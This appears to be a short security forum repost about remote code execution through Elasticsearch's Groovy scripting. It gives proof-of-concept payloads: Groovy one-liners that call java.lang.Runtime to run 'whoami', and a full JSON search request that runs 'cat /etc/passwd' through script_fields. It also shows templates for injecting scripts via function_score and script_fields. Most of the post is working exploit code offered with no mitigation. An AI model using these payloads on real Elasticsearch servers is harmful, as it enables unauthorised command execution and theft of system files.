elasticsearch scripting security issues

  • A+
所属分类:WooYun-Zone

elasticsearch scripting:

http://www.elasticsearch.org/guide/en/elasticsearch/reference/current/modules-scripting.html

security issues:

http://www.elasticsearch.org/community/security/

http://mp.weixin.qq.com/s?__biz=MjM5OTk2MTMxOQ==&mid=202983721&idx=1&sn=bde079dcee38c4c655e920cbcc78c6e8&scene=0

POC:

Math.class.forName(\"java.lang.Runtime\").getRuntime().exec(\"whoami\").getText()
super.class.toString().valueOf('whoami').execute().getText()

http://zone.wooyun.org/content/18915

{"size":1,"script_fields": {"iswin": {"script":"java.lang.Math.class.forName(\"java.io.BufferedReader\").getConstructor(java.io.Reader.class).newInstance(java.lang.Math.class.forName(\"java.io.InputStreamReader\").getConstructor(java.io.InputStream.class).newInstance(java.lang.Math.class.forName(\"java.lang.Runtime\").getRuntime().exec(\"cat /etc/passwd\").getInputStream())).readLines()","lang": "groovy"}}}

 

{
  "size": 1, 
  "query": {
    "function_score": {
      "script_score": {
        "script": "POC............",
        "lang": "groovy"
      }
    }
  }
}

 

{
    "size": 1, 
    "script_fields": {
        "my_field": {
            "script": "POC.........."
        }
    }
}

 

  • 我的微信
  • 这是我的微信扫一扫
  • weinxin
  • 我的微信公众号
  • 我的微信公众号扫一扫
  • weinxin

发表评论

:?: :razz: :sad: :evil: :!: :smile: :oops: :grin: :eek: :shock: :???: :cool: :lol: :mad: :twisted: :roll: :wink: :idea: :arrow: :neutral: :cry: :mrgreen: